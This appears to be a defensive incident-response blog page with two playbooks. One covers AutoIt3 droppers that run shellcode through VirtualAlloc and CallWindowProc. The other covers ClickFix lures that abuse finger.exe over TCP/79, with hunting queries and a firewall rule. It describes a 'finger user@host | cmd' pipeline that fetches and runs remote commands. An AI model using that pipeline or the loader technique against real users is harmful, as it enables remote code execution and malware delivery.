Windows

How to triage and hunt AutoIt3-compiled droppers that write obfuscated shellcode to %TEMP%, allocate RWX memory, and execute via CallWind...

SANS ISC documented fresh AutoIt3-compiled droppers that embed payloads with FileInstall, write obfuscated bytes to %TEMP%, allocate RWX memory with VirtualAlloc, then execute shellcode via CallWindowProc. The samples include commodity payloads (e.g., Quasar RAT, Phantom stealer). DFIR teams should assume more of these will show up in email/download chains and prepare hunts and triage checklists now (SANS ISC diary). (isc.sans.edu)

Intrusion Flow

Delivery: compiled AutoIt3 PE executable. AutoIt’s compiler bundles the tokenized script and any files added via FileInstall into the binary, enabling single-file distribution (AutoIt compiler docs). (autoitscript.com)
Drop/Stage: the script calls FileInstall to extract embedded files at runtime; in the analyzed sample, it wrote artifacts like “inhumation” and “buncal” into %TEMP% (FileInstall reference; SANS ISC diary). (autoitscript.com)
Decode: simple string arithmetic deobfuscates API names and payload bytes (e.g., shift by −1 per character), yielding resolved imports such as kernel32/user32 and shellcode buffers (SANS ISC diary). (isc.sans.edu)
Load: the script allocates memory with VirtualAlloc using MEM_COMMIT | MEM_RESERVE (0x3000) and PAGE_EXECUTE_READWRITE (0x40), then copies the shellcode into the buffer (VirtualAlloc documentation). (learn.microsoft.com)
Execute: CallWindowProc is invoked with a pointer into the shellcode, executing on the current GUI thread without creating a new thread-behavior that can blend in with benign GUI activity (CallWindowProc documentation; prior SANS note on this technique). (learn.microsoft.com)

Key Artifacts to Pull

Disk
- %TEMP% artifacts named by the script (e.g., embedded files like “inhumation”, “buncal”) and the original AutoIt3-compiled loader executable. Parse MFT/USN timestamps and look for same-second write/execute patterns (SANS ISC diary). (isc.sans.edu)
- Prefetch for the loader EXE to confirm first/last run, run count, and child DLLs. PECmd supports all modern Prefetch formats (PECmd). (github.com)
- Program execution artifacts: Amcache.hve commonly records executed PE metadata including path and SHA-1; use it to corroborate execution of the loader (Amcache background and path). (cybertriage.com)
Memory
- Dump live memory if possible. Look for RWX regions and injected code; Volatility’s malfind helps surface suspicious VADs with PAGE_EXECUTE permissions (Volatility malfind). (github.com)
Logs/Telem
- Sysmon Event ID 1 (process creation) for the loader and its child processes; Event ID 11 (FileCreate) for new files in %TEMP%. Enable network (ID 3) if applicable. Confirm Sysmon schema and event semantics in Microsoft’s reference (Sysmon docs). (learn.microsoft.com)

Detection Notes

Static triage
- AutoIt compiled loaders can often be identified by tooling and YARA. Community YARA rules flag AutoIt-compiled PEs; the ecosystem reports broad sightings of such rules in the wild (MalwareBazaar YARA: AutoIT_Compiled). (bazaar.abuse.ch)
- Indicators in extracted content: look for tokens/FileInstall references, kernel32/user32 API usage via DllCall, and strings like VirtualAlloc/CallWindowProc after deobfuscation. Extraction/decompilation helpers exist, e.g., AutoIt-Ripper and myAut2Exe (use in a lab VM) (AutoIt-Ripper; myAut2Exe). (github.com)
Behavior hunts (host)
- Group signals: short-lived loader that (a) creates extensionless temp files, (b) immediately reads them, (c) spawns no obvious child interpreters, and (d) exhibits GUI-thread API usage. Correlate Sysmon ID 1 + 11 with the loader image path and %TEMP% targets (Sysmon docs). (learn.microsoft.com)
Behavioral rationale
- CallWindowProc is a legitimate GUI API that can invoke an arbitrary function pointer; adversaries use it to execute payloads without CreateThread, which can sidestep common thread-creation detections (CallWindowProc; SANS technique overview). (learn.microsoft.com)

Response Guidance

Triage and containment
- If the loader executed, isolate the endpoint, capture memory, and acquire a full disk image or triage package including %TEMP%, user profile AppData, Prefetch, Amcache.hve, and relevant Event Logs/Sysmon. Prioritize memory due to ephemeral RWX buffers (Volatility malfind). (github.com)
Analysis workflow
1. Identify the loader: check signature and entropy; run Detect-It-Easy or similar to fingerprint the packer/interpreter; scan with AutoIt-specific YARA (Detect-It-Easy project page; YARA AutoIT_Compiled). (github.com)
2. Extract embedded resources: attempt AutoIt-Ripper/myAut2Exe; search for AU3 headers and exported resources; validate any decoded shellcode buffers before execution in a sandbox (AutoIt-Ripper; myAut2Exe). (github.com)
3. Confirm behavior/lateral artifacts: correlate FileCreate in %TEMP% and subsequent memory execution; if payload families are indicated (e.g., Quasar/Phantom), pivot to family-specific hunts (SANS ISC diary discussion of payloads). (isc.sans.edu)
Hardening and prevention
- Application control: allow-list legitimate AutoIt use; block unsigned AutoIt-compiled executables from user-writeable paths. Preferably, distribute approved .a3x/.exe only via trusted software channels (AutoIt compiler behavior and formats). (autoitscript.com)
- Telemetry: ensure Sysmon/EDR capture of process, file, and network activity; many detections for shellcode allocation hinge on correlating VirtualAlloc + immediate RWX execution with unusual temp-file stages (Sysmon overview; VirtualAlloc documentation). (learn.microsoft.com)

Takeaways

Treat AutoIt3-compiled PEs that write to %TEMP% and then allocate RWX memory as high-priority investigations. Hunt for FileInstall use, temp-file stages, VirtualAlloc with RWX, and CallWindowProc execution. Instrument Sysmon, build YARA for AutoIt loaders, and keep an extraction/deobfuscation toolchain ready (SANS ISC diary; VirtualAlloc; CallWindowProc; AutoIt FileInstall). (isc.sans.edu)

DFIR playbook for ClickFix campaigns that abuse Windows finger.exe over the Finger protocol (TCP/79), with concrete artifacts, hunts, and...

SANS Internet Storm Center reports that current ClickFix campaigns are abusing the built-in Windows finger.exe client to retrieve attacker-hosted scripts over the legacy Finger protocol. The tool isn’t proxy-aware and the destination port is fixed to 79/TCP, which means well-configured explicit egress proxies that block TCP/79 will break this stage. (isc.sans.edu)

Intrusion Flow

Initial social engineering. ClickFix pages masquerade as “human verification” or problem/solution flows that preload a command into the clipboard and instruct the user to paste and run it. Recent variants add OS detection, countdown timers, and even video instructions to increase compliance. (bleepingcomputer.com)
Fetch via Finger. In the finger.exe-enabled branch, the lure runs a command that uses Finger to pull a remote command stream and then pipes it into a shell for execution (for example, finger user@host | cmd). BleepingComputer documented live samples where the finger output is piped to cmd.exe to stage additional tooling. (bleepingcomputer.com)
Payload staging. Observed scripts create working directories, rename built-in utilities (for example, curl.exe) and fetch archives masquerading as benign files, expanding to stealer or RAT payloads. (bleepingcomputer.com)
Evolution to FileFix. Some crews now avoid terminals entirely, abusing the File Explorer address bar to execute hidden PowerShell (FileFix) as an evolution of the same idea. Expect the Finger fetch step to be swapped for other low-visibility transports over time. (bleepingcomputer.com)

Key Artifacts to Pull

Process execution
- Windows Security Event ID 4688 with command line (enable “Include command line in process creation events”). Hunt for finger.exe and any pipeline to cmd.exe/PowerShell. (learn.microsoft.com)
- Sysmon Event ID 1 (ProcessCreate) for C:\Windows\System32\finger.exe and parent lineage (browser → cmd.exe → finger.exe, etc.). (learn.microsoft.com)
Network evidence
- Sysmon Event ID 3 (NetworkConnect) showing outbound TCP connections to remote port 79 with Image ...\finger.exe. (system32.eventsentry.com)
- Windows Filtering Platform (WFP) events if “Audit Filtering Platform Connection” is enabled: 5156 (allowed) and 5157 (blocked), which include app path, IPs, and ports. (windows-security.org)
- Host firewall logs (pfirewall*.log) if “log successful connections” and/or “log dropped packets” is enabled. (learn.microsoft.com)
Disk artifacts (execution evidence)
- Prefetch: FINGER.EXE-*.pf under C:\Windows\Prefetch (run count and up to eight last-run timestamps on Win 8+). (magnetforensics.com)
- Amcache: C:\Windows\AppCompat\Programs\Amcache.hve can record program presence (and sometimes execution metadata); treat it as corroboration, not sole proof of execution. (securelist.com)

Detection Notes

Microsoft Defender XDR (Advanced Hunting)

Process creation and network join:

let lookback = 14d;
let finger_execs = DeviceProcessEvents
  | where Timestamp > ago(lookback)
  | where FileName =~ "finger.exe";
let finger_net = DeviceNetworkEvents
  | where Timestamp > ago(lookback)
  | where RemotePort == 79 and Protocol =~ "Tcp";
finger_execs
  | project Timestamp, DeviceName, InitiatingProcessAccountName, ProcessCommandLine, FolderPath, ProcessId
  | join kind=leftouter (
      finger_net | project Timestamp, DeviceName, RemoteIP, RemotePort, InitiatingProcessId, InitiatingProcessCommandLine
    ) on $left.DeviceName == $right.DeviceName and $left.ProcessId == $right.InitiatingProcessId
  | order by Timestamp desc

Uses DeviceProcessEvents and DeviceNetworkEvents schemas. (learn.microsoft.com)

Suspicious pipeline usage:

DeviceProcessEvents
| where Timestamp > ago(14d)
| where FileName =~ "cmd.exe" or FileName =~ "powershell.exe"
| where ProcessCommandLine has "finger " and ProcessCommandLine contains "|"

Back this with network to TCP/79 where available. (learn.microsoft.com)

Windows Eventing/Sysmon
- Enable Security 4688 with command line and Sysmon IDs 1 and 3; filter on Image endswith \\finger.exe and DestinationPort = 79. (learn.microsoft.com)
Packet capture/NIDS
- Finger is TCP/79; on packet tools, filter tcp.port == 79. Zeek has historically provided a Finger analyzer, but check your version and plugin set-many deployments will simply rely on conn.log for port 79 traffic. (iana.org)

Response Guidance

Contain egress on TCP/79
- The attacking step depends on direct TCP/79 to the Internet. Block 79/TCP egress from user segments at your perimeter and host firewalls. This aligns with baseline control guidance to default-deny outbound on endpoints and only allow required services. (isc.sans.edu)
- Example (local host firewall, admin CMD):
```
netsh advfirewall firewall add rule name="Block TCP79 Outbound" dir=out action=block protocol=TCP remoteport=79
```
  Or deploy an outbound port rule via GPO/MDM at scale. (learn.microsoft.com)
Proxy design
- finger.exe is not proxy-aware; in environments with explicit proxies and default-deny egress, the fetch will fail. In transparent proxy setups, ensure port 79 is denied outbound. (isc.sans.edu)
Endpoint hardening
- Where feasible, block or tightly scope finger.exe via AppLocker/WDAC policy (publisher/path/hash rule), while monitoring for operational impact. (learn.microsoft.com)
Host triage
- Isolate the system; collect Security 4688, WFP 5156/5157, Sysmon 1/3, Prefetch, Amcache, and firewall logs. Review the parent chain that launched finger.exe and any subsequent curl/PowerShell activity to determine secondary payloads. (learn.microsoft.com)
User comms
- Re-educate on ClickFix patterns: fake Cloudflare checks, clipboard-injected commands, “Win+R → Ctrl+V → Enter,” and the Explorer address-bar variant (FileFix). (securityweek.com)

Takeaways

Add hunts and detections for finger.exe execution and outbound TCP/79 connections; block TCP/79 egress broadly. (isc.sans.edu)
Treat any finger ... | cmd/PowerShell pipeline as high-signal and pivot to payload retrieval and persistence checks. (bleepingcomputer.com)
Reinforce application control and user training to blunt evolving ClickFix/FileFix social-engineering chains. (bleepingcomputer.com)

Windows

AutoIt3 droppers with FileInstall + CallWindowProc: an IR playbook

Intrusion Flow

Key Artifacts to Pull

Detection Notes

Response Guidance

Takeaways

ClickFix pivots to finger.exe: how to spot and stop TCP/79 script fetches

Intrusion Flow

Key Artifacts to Pull

Detection Notes

Response Guidance

Takeaways